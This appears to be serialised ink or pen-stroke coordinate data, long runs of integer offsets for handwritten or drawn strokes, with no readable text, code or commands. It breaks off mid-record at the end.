0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,-20-23-6573,14 16 4071,-5-5-1121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0 112,'0'0'721,"9"0"162,-14 2-432,11 2 1658,-15-8-238,11 7-500,5 11 5165,2 4-5190,-9-18-1336,0 0 0,-1 0 0,1 0-1,0 1 1,-1-1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1-1,1-1 1,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,1 0 0,0 1 0,3 25 576,-9-16-400,5-10-186,0 0-1,-1 0 1,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0-1,0-1 1,1 3 9,0-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 4 1,2 17 88,1-17-83,0 0 0,0-1 0,0 1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-2 6 0,1 20 86,1-30-88,-11 10 24,11 74-188,0-84 245,-2 48 135,1-47-221,0 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,1 1 0,-1 3 0,0-1 1,0-4-19,-6 3 11,2 23-29,4 38 108,-1-65-89,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 1,1 1-1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 2 0,0 0 9,0-1-1,0 0-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1-1,-1 2 1,1 1 9,0-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,1 3 0,0 11-47,-1 48 233,0-64-182,0 42 266,0-30-227,0 30-20,0-41-30,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 0,-1 2 0,2-3-1,0 0 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,1 0-1,-1 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,-2 1 0,2 17 45,-1 5-23,0-21-11,1 0 1,0 0-1,-1 0 1,1 1-1,0-1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,1 6 0,-1-9-3,0 0 22,0 49 402,0 26 43,0-75-417,-11 29 525,11-24-518,0-5-56,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,-1 50 1054,2-47-1027,0-3-33,1 0 0,-1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,0 0 124,-1 30 1201,1-30-1333,0 1 1,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,0-1 0,-1 1 0,1 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0-1 1,0 2 0,0-1 487,-1-1-481,1 0-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,-1-1-1,1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0 0 0,-2 26 38,1-26-129,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,-2 1 0,1-1-1948,-2 3-167,-1-3-3125,-14-2-1654,9-4 3433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 1 744,'-11'7'3814,"2"4"-1410,8-11-2249,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 2 0,-11 16 2980,10-15-2895,0 0 0,0 0 1,0 0-1,-1-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,0 0-1,1 0 0,-5 3 1,4-4-170,0 1 1,0-1-1,0 1 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 5 1,-22 27 427,21-32-419,1 2-1,-1-1 1,1 0 0,0 1 0,0 0 0,-4 9 0,5-9 12,-1 0 0,1-1-1,-1 1 1,0 0 0,0-1 0,-8 8 0,-21 29 416,26-36-450,1 1 0,-1 0-1,1 1 1,1-1 0,-6 11-1,6-9-35,-1-1 1,0 0-1,0 0 0,0 0 0,-11 9 0,-18 31 30,4-10 1,22-33-87,9-10-213,3-1-233,-1 9-255,-2-6 121,1 0-1,0 0 0,1 1 0,-1-1 0,1 1 1,0 0-1,-1 0 0,5-4 0,11-13-3315,3-15-2173,-10 16 3099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0 520,'0'0'10624,"2"12"-6249,39 20-1810,-29-28-2426,-1 2-1,0 0 0,0 0 0,0 1 0,-1 0 1,0 1-1,0 0 0,16 18 0,22 16 337,29 30-111,-11-11-24,-55-51-118,-1-1 0,-1 2 0,1-1 0,7 15 0,9 7 69,-20-23-258,-1-3-19,-3-10 118,3-2-170,-3 3-120,-8-5-91,-6-24-3990,-33-34-9038,25 43 9679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73 104,'0'0'692,"-22"-13"3652,22 11-4139,0 0 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,1-2-1,-1 3-34,-1 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,0 0 0,0 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,0-1-1,-5 0 3065,3 13-3047,3-10-45,3 0-100,-1 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 1 0,-1-1 0,2 4 0,-2-4 0,20 18 245,-16-17-222,0 1 0,-1 1 0,0-1 0,1 0 0,5 10 0,-3-5 62,1 0 0,1-1 0,15 13 0,-20-18-77,6 5 34,-7-6-44,1 0-1,-1 1 0,1-1 0,-1 1 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,-1 1 0,0-1 1,0 1-1,0 0 0,3 7 0,-5-8 2,1-1-1,0 1 1,0 0-1,1 0 1,-1-1-1,1 1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0 1-1,2 1 0,-2-2-27,1 0-1,-1 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,1 3 0,1-2-23,0-1 0,0 1 0,1-1-1,-1 0 1,1 0 0,6 4-1,-7-6-153,0 1 0,0 0 0,0-1 0,0 0-1,0 1 1,0-1 0,0 0 0,6 0 0,-7-1-86,-1 0-1,0 0 1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0-1 0,9-8-2463,-9 10 2533,-1 0 1,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-1-1,0-5-2682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22 400 224,'-2'5'1138,"-12"7"7920,10-10-8815,2-2 547,3 0-655,-1 1 1,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,0 0 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,-1 1-1,1 0 1,0 0-1,-1-1 0,2 0 1,28-10 263,-18 3-260,-1-1 1,-1 1-1,1-2 1,16-19-1,-1 1-36,5-3-35,80-72 101,-46 47-65,-42 35-15,0 0-1,2 2 0,33-21 0,-42 29-71,-13 9-19,-1-1 1,1 1-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,6-2-1,-7 3-15,-2 1-196,0 0 98,0 0 0,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-2 0 0,-30-3-6989,18 2 4332,2 1-492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1 208,'-4'3'18651,"1"1"-14872,-1 1-5152,5-5 1399,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,15 22 349,-13-19-255,-2-2-103,1 1 0,-1-1 0,0 0-1,0 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0-1 0,2 4 0,-1-3-6,-1-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 4-1,11 25 143,-1 11-40,1 7 40,0-8-64,-11-39-86,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,1 3 0,7 19 30,-10-21-31,0-1 0,1 0 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,0 0 0,0 0-1,3 4 1,-3-4-1,0 0 0,0 0 0,1 0 0,-1 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,-1-1 0,1 4-1,31 48 108,-31-53-104,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,2 0 0,-2-1-2,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,-1 1 0,1-1 0,0 2 0,10 45 140,-1-19 48,-10 22-1,11-27-150,-11-23-38,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-2-1-1,1-1 0,-1 0 1,0 1-1,1-1 0,-1 0 1,0 1-1,0-1 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,2 6 98,-2-7-99,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 0 1,-1 1-1,0-1 0,1 0 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 0 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 0,-1 0 1,1 2-6,-1 0 1,1 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,1 5-1,-2-8 6,0 0 0,-1 1 0,1-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,4 13 48,-4-12-45,0 0-5,0 3 2,0-3 38,2-14 28,4 9-61,8-3-18,3 0 9,-16 5 1,1 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 0,2 0 0,48-6 45,34 0-16,-76 5-29,0-1 1,0 0-1,-1 0 1,1-1-1,-1-1 1,18-7-1,-26 10 2,0 0 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 1 0,7 5-15,9 0 15,-16-7 7,0 0-3,5 0-4,-3 0 3,5 0-3,1 0-4,23 6 13,-31-6-10,0 0-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,3 2-1,16 5-2,-7 3 9,-12-9-8,-1-2 3,16-6-29,2 6 73,-18 0-43,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,2 1-3,5 0 3,-5 0 14,21 6-13,-22-3 0,29-6-6,-18-2-3,-3 4 8,0 1 1,-5 0 2,3 0 0,-5 0-6,0 0-1,5 0 2,-5 0 23,0 0-23,5 0 1,-5 0-3,-1 0 4,7 0 4,-7 0-1,23 0-35,-17 0 34,-5 0 5,10 5-43,-5-4 35,47 11 62,-52-12-53,0 13 76,27-14 330,-28 1 565,-1-1-774,0 2-154,-23 10-1838,14-5 985,8-5 282,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,-1 0 1,1 0 0,0-1-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-5-1 0,-23 0-6780,19 1 3449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16 52,'-2'-11'3932,"-1"10"-3800,3 0 38,-1 1 1,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 1-1,1-1 1,-1 0-1,0 1 1,4 2-50,-3-3 32,0 0 1,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 1 462,1-1-462,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,2 36 1135,0-32-1241,-1 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,-1 1 0,1 5 0,7 31 248,-7-36-265,0-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,0-1-1,0 1 0,0 6 1,-1-8-14,1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,3 7 0,-3-5 5,0 0-1,0 0 1,0 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,-1 0 1,0 6-1,-1 9 38,-8 25 7,10-41-71,0 0 7,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0-1-1,-3 8 0,-7 42 10,8-47-8,1 1 0,0-1 1,0 1-1,0 0 0,1-1 1,0 1-1,1 0 0,-1 0 0,2 13 1,-1-9-4,-11 27 131,1 10-43,-1-6-159,11-40 76,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,0 0 0,0 1 0,0-1 0,-2 3 0,2-2-4,0-1 0,0 1 0,0-1 0,1 1 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,1 3 1,-1-4-5,1 0 1,-1 1 0,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,-2 2 0,3-2 2,-1-1 0,1 1 1,-1 0-1,1 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 1,-1 1-1,1 0 1,-1-1-1,1 1 0,0 0 1,0-1-1,0 1 1,0-1-1,1 2 1,-1-1-2,0 0 1,0 0 0,-1-1-1,1 1 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1 0,0 1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 3 1,0 0 7,-10 48 7,12-40-22,-1-11 7,1 0 0,-1-1 1,0 1-1,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,-1-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,1-1 1,-1 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-2 1 0,3-3 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,-1-1 1,1 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,1 1 1,0 0 0,-1 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 1 0,-1 2-3,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 1-1,1-1 1,0 0 0,0 0-1,2 8 1,-1 13 5,-1-24 1,0 0 5,0 1-11,0-1 0,0 1 1,0-1-1,0 1 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 1,1 0-1,3 14 11,-5-15 6,-1-1-16,0 0 1,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 1-1,-1 0 1,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0 0 1,0 27 12,1-17-37,-3-9 17,-5 3 6,7-4 1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 1-1,1-1 1,-1 1-1,-2 5 58,1-5-48,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1-1,1-1 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0 0 0,0 4 7,-3 1 21,2-6-23,0-1 0,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,1 1 1,-1 51 521,0-52-522,-11-8-151,0-29-4000,6 12 137,4 22 3654,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,0 1-1,0 0 0,0 0 0,0-1 0,1-1 0,6-26-3255,-5 0 94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7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73 648,'-2'-12'4552,"2"12"-4450,-1 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1 0,0 1 589,24 17 3772,-3-16-3717,22-3 27,-18-3-575,0 2 0,0 0 0,1 2 0,-1 0 0,0 2 1,0 1-1,45 10 0,-54-10-65,1 0 0,-1-2 1,1 0-1,21-1 0,-14-1-9,12 2 118,0-2-1,0-1 1,0-2 0,37-9-1,-58 9-155,-5 1-26,-1 0 0,1 1 0,0 0 0,20-1 0,91-3 208,-103 5-179,0-1 0,32-8 0,-12 3 121,-31 6-189,0 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,7-4 0,31-7 43,-41 13-63,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,6 3-1,25 3 1,-27-7 6,-5-1-7,15-10-6,-18 11 5,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,1 0 2,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,1-1-1,-1 0 0,0 1 1,0-1-1,1 0 1,-1 0-1,3 0 0,13 0 2,-16 0-4,0 0 3,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,3-2 0,5-1-9,16-5-52,-21 5 51,0 2-3,3 1 9,-5 0 1,0 0 1,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0 0-1,3 2 1,10 1-6,-13-4 13,52 0 29,-45 0-32,-6 0 1,4 0-6,-5 0-7,32 0 49,17 0 464,-50 0-316,-3-1-369,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 1,0 0-1,1 0 0,-1 1 0,0-1 0,-3 1 0,-23-2-5842,7-5-1117,12 1 3367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9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22 189 516,'0'0'1949,"-21"13"6312,42-9-1119,76 9-5948,-35-12-665,-27 0-132,0-1 0,58-7 1,-59 1-278,0 2 0,38 1 0,132 9 878,-190-7-939,0-1-1,0-1 0,0 1 0,-1-2 1,24-9-1,-20 7 62,0 0 1,28-5 0,-2 4 227,55-16 1,-1 17-329,-85 2-5,1 1 0,0 1 0,22-2 0,-33 4-1,39-12-65,-16 7 66,-21 3-14,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,4 2 0,185 11 28,-182-11-15,8-1-19,0-2 20,-16 2-12,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-2 0 0,1 0 0,6-3 1,-7 3 2,32-6 19,-25 7-26,0 0 2,-8 1-2,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,0-1 1,1 1-1,-1-1 0,1 1 0,-1-1 1,2-1-1,6 1 4,23-1-11,2 3 24,-5 5 28,1-3 0,37 2 0,-65-5-40,21 5 64,-16-11-55,-7 6-12,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 0 0,-1 1 0,1 0 0,6 0-4,-1 0-6,9-8 62,-11 6-57,20-3 8,-19 2-3,-3 2-1,32-17 36,-32 16-152,-4 1-169,-22 4-1955,22-4 1863,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0-1 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,-2-2 0,-39-32-10694,32 23 7307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5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 36,'0'0'7180,"9"-6"-5070,-10 6-1908,0 0 0,0 0 